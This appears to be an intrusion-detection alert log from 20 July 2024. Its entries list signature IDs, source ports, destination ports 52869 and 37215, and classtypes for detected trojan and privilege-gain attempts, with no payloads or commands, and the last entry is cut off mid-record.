                      Timestamp:07/20/24-23:01:26.151841
                      SID:2025132
                      Source Port:58956
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:08.567236
                      SID:2831300
                      Source Port:57370
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:11.822392
                      SID:2829579
                      Source Port:55546
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.894920
                      SID:2027339
                      Source Port:56832
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:55.359808
                      SID:2025132
                      Source Port:39022
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:34.048618
                      SID:2835222
                      Source Port:43842
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:01.410784
                      SID:2025132
                      Source Port:49602
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:31.982801
                      SID:2829579
                      Source Port:37172
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.259642
                      SID:2027339
                      Source Port:52638
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.762457
                      SID:2027339
                      Source Port:40778
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.912947
                      SID:2025132
                      Source Port:32852
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:45.134490
                      SID:2027339
                      Source Port:56872
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:06.767377
                      SID:2025132
                      Source Port:42954
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:07.005156
                      SID:2835222
                      Source Port:60556
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.594120
                      SID:2027339
                      Source Port:43500
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.555718
                      SID:2831300
                      Source Port:35216
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:43.555329
                      SID:2831300
                      Source Port:58004
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:42.778817
                      SID:2027339
                      Source Port:40746
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:00.641498
                      SID:2829579
                      Source Port:47806
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:25.472685
                      SID:2025132
                      Source Port:58500
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:47.931025
                      SID:2831300
                      Source Port:40976
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:47.892814
                      SID:2831300
                      Source Port:53108
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:42.499887
                      SID:2025132
                      Source Port:33130
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:40.296076
                      SID:2835222
                      Source Port:45744
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:25.302531
                      SID:2027339
                      Source Port:49410
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.807536
                      SID:2027339
                      Source Port:48546
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:58.249114
                      SID:2027339
                      Source Port:51848
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.585790
                      SID:2027339
                      Source Port:54006
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:32.039718
                      SID:2829579
                      Source Port:33136
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:12.807585
                      SID:2027339
                      Source Port:55898
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.571815
                      SID:2831300
                      Source Port:57584
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:07.082045
                      SID:2835222
                      Source Port:51914
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.683684
                      SID:2831300
                      Source Port:37206
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:46.893328
                      SID:2831300
                      Source Port:45904
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:51.562834
                      SID:2025132
                      Source Port:53128
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:44.700808
                      SID:2831300
                      Source Port:36296
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:12.807274
                      SID:2027339
                      Source Port:55108
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:49.172806
                      SID:2027339
                      Source Port:54868
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.664220
                      SID:2027339
                      Source Port:59234
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:11.028341
                      SID:2027339
                      Source Port:52050
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.632446
                      SID:2027339
                      Source Port:53810
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:53.356560
                      SID:2025132
                      Source Port:51592
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:31.978142
                      SID:2835222
                      Source Port:58734
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:07.054782
                      SID:2835222
                      Source Port:36520
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.749865
                      SID:2025132
                      Source Port:59638
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:08.677485
                      SID:2027339
                      Source Port:57276
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.974837
                      SID:2829579
                      Source Port:39248
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:09.668312
                      SID:2025132
                      Source Port:56908
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:31.326982
                      SID:2027339
                      Source Port:48746
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.854348
                      SID:2027339
                      Source Port:42622
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:40.336908
                      SID:2829579
                      Source Port:53880
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:27.650871
                      SID:2829579
                      Source Port:56940
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:11.816101
                      SID:2835222
                      Source Port:39610
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.599362
                      SID:2831300
                      Source Port:51788
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:31.312311
                      SID:2831300
                      Source Port:49010
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:43.173843
                      SID:2025132
                      Source Port:47334
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:31.311885
                      SID:2027339
                      Source Port:47082
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:40.275256
                      SID:2829579
                      Source Port:42886
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.507489
                      SID:2831300
                      Source Port:34838
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:40.323034
                      SID:2835222
                      Source Port:35098
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.230950
                      SID:2835222
                      Source Port:45392
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.093693
                      SID:2025132
                      Source Port:38192
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:47.163877
                      SID:2831300
                      Source Port:47156
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:45.414030
                      SID:2831300
                      Source Port:55036
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:48.161610
                      SID:2027339
                      Source Port:60168
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.790680
                      SID:2025132
                      Source Port:54812
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:43.903732
                      SID:2027339
                      Source Port:34390
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.054387
                      SID:2835222
                      Source Port:44574
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:00.639093
                      SID:2835222
                      Source Port:46260
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.648154
                      SID:2027339
                      Source Port:54326
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:04.022245
                      SID:2025132
                      Source Port:48240
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:31.975330
                      SID:2829579
                      Source Port:41040
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:00.709103
                      SID:2831300
                      Source Port:44902
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:40.322860
                      SID:2829579
                      Source Port:37002
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:14.060998
                      SID:2829579
                      Source Port:53858
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.142086
                      SID:2025132
                      Source Port:57262
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:14.105908
                      SID:2829579
                      Source Port:50158
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:14.111381
                      SID:2835222
                      Source Port:59232
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:27.654173
                      SID:2829579
                      Source Port:42294
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.693711
                      SID:2831300
                      Source Port:50610
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:02.076414
                      SID:2829579
                      Source Port:45278
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:53.122466
                      SID:2025132
                      Source Port:53464
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:02:04.133788
                      SID:2025132
                      Source Port:58818
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:34.044538
                      SID:2835222
                      Source Port:39770
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.159165
                      SID:2831300
                      Source Port:43160
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:46.220244
                      SID:2025132
                      Source Port:37292
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:57.943877
                      SID:2027339
                      Source Port:50128
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.484644
                      SID:2025132
                      Source Port:51464
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:42.165780
                      SID:2027339
                      Source Port:44556
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:06.975117
                      SID:2835222
                      Source Port:51316
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:11.822392
                      SID:2835222
                      Source Port:42414
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:53.420758
                      SID:2831300
                      Source Port:59858
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:46.439689
                      SID:2027339
                      Source Port:48834
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:06.994337
                      SID:2835222
                      Source Port:36820
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.667512
                      SID:2831300
                      Source Port:58964
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:01.521998
                      SID:2025132
                      Source Port:41562
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:55.802130
                      SID:2027339
                      Source Port:49964
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.582150
                      SID:2831300
                      Source Port:37226
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:27.650975
                      SID:2835222
                      Source Port:41132
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:14.090830
                      SID:2829579
                      Source Port:55006
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.149798
                      SID:2835222
                      Source Port:47014
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.315380
                      SID:2025132
                      Source Port:47042
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:02:12.085791
                      SID:2831300
                      Source Port:37886
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:14.117066
                      SID:2829579
                      Source Port:46970
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:57.221338
                      SID:2835222
                      Source Port:47982
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.010169
                      SID:2831300
                      Source Port:42946
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:58.001186
                      SID:2027339
                      Source Port:43662
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.298259
                      SID:2027339
                      Source Port:59392
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:59.213564
                      SID:2829579
                      Source Port:60464
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:51.290015
                      SID:2025132
                      Source Port:45152
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:44.392836
                      SID:2025132
                      Source Port:56896
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:43.096223
                      SID:2027339
                      Source Port:56734
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:51.956762
                      SID:2831300
                      Source Port:42524
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:02.055683
                      SID:2829579
                      Source Port:40528
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.110861
                      SID:2829579
                      Source Port:43186
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.389908
                      SID:2027339
                      Source Port:48504
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.317668
                      SID:2831300
                      Source Port:56692
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:43.141970
                      SID:2025132
                      Source Port:45448
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:50.332163
                      SID:2025132
                      Source Port:49330
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:13.345185
                      SID:2025132
                      Source Port:43504
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:20.597058
                      SID:2831300
                      Source Port:40540
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:01.505774
                      SID:2027339
                      Source Port:35458
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:59.030101
                      SID:2027339
                      Source Port:50420
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:10.513310
                      SID:2025132
                      Source Port:46946
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:44.839991
                      SID:2027339
                      Source Port:38688
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.188773
                      SID:2831300
                      Source Port:48818
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:40.311124
                      SID:2835222
                      Source Port:37448
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.482016
                      SID:2027339
                      Source Port:60160
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.613164
                      SID:2831300
                      Source Port:57934
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:21.943544
                      SID:2829579
                      Source Port:38244
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:09.321968
                      SID:2831300
                      Source Port:55380
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:00:57.221910
                      SID:2835222
                      Source Port:51880
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:52.380418
                      SID:2831300
                      Source Port:35076
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:08.655109
                      SID:2027339
                      Source Port:34348
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.399678
                      SID:2025132
                      Source Port:44296
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:49.555689
                      SID:2027339
                      Source Port:52848
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.921416
                      SID:2025132
                      Source Port:55612
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:44.510114
                      SID:2027339
                      Source Port:46904
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.313122
                      SID:2027339
                      Source Port:35230
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:56.327422
                      SID:2025132
                      Source Port:57670
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:41.217142
                      SID:2027339
                      Source Port:32860
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:21.004725
                      SID:2831300
                      Source Port:58336
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:52.940746
                      SID:2027339
                      Source Port:36876
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.544315
                      SID:2027339
                      Source Port:34768
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.318206
                      SID:2027339
                      Source Port:33518
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:59.153608
                      SID:2835222
                      Source Port:49226
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.096223
                      SID:2831300
                      Source Port:60328
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:43.957856
                      SID:2027339
                      Source Port:49062
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:52.482723
                      SID:2025132
                      Source Port:58162
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:40.320408
                      SID:2835222
                      Source Port:51774
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:40.311124
                      SID:2835222
                      Source Port:46666
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.280418
                      SID:2027339
                      Source Port:49070
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:49.207937
                      SID:2025132
                      Source Port:58860
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:48.016319
                      SID:2027339
                      Source Port:41614
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.975513
                      SID:2835222
                      Source Port:32976
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:01.793488
                      SID:2025132
                      Source Port:57682
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:08.677485
                      SID:2831300
                      Source Port:54274
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:50.418920
                      SID:2025132
                      Source Port:47852
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:20.132103
                      SID:2835222
                      Source Port:40700
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.983105
                      SID:2835222
                      Source Port:58644
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.572790
                      SID:2831300
                      Source Port:39552
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:02:04.133788
                      SID:2027339
                      Source Port:57830
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.064240
                      SID:2829579
                      Source Port:56680
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.908066
                      SID:2025132
                      Source Port:55258
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:46.150064
                      SID:2027339
                      Source Port:34880
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:00.908220
                      SID:2027339
                      Source Port:56222
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:53.064325
                      SID:2027339
                      Source Port:54512
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:00.638418
                      SID:2835222
                      Source Port:40104
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:56.304951
                      SID:2025132
                      Source Port:45530
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:47.331200
                      SID:2025132
                      Source Port:46806
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:42.527235
                      SID:2831300
                      Source Port:58096
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:42.988853
                      SID:2025132
                      Source Port:55828
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:26.125703
                      SID:2025132
                      Source Port:36076
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:42.334131
                      SID:2025132
                      Source Port:55440
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:56.667752
                      SID:2831300
                      Source Port:33118
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:24.876750
                      SID:2835222
                      Source Port:53958
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:21.954501
                      SID:2829579
                      Source Port:50736
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.023201
                      SID:2027339
                      Source Port:38018
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:07.493932
                      SID:2027339
                      Source Port:48246
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.165718
                      SID:2831300
                      Source Port:33260
                      Destination Port:52869
                      Protocol:TCP
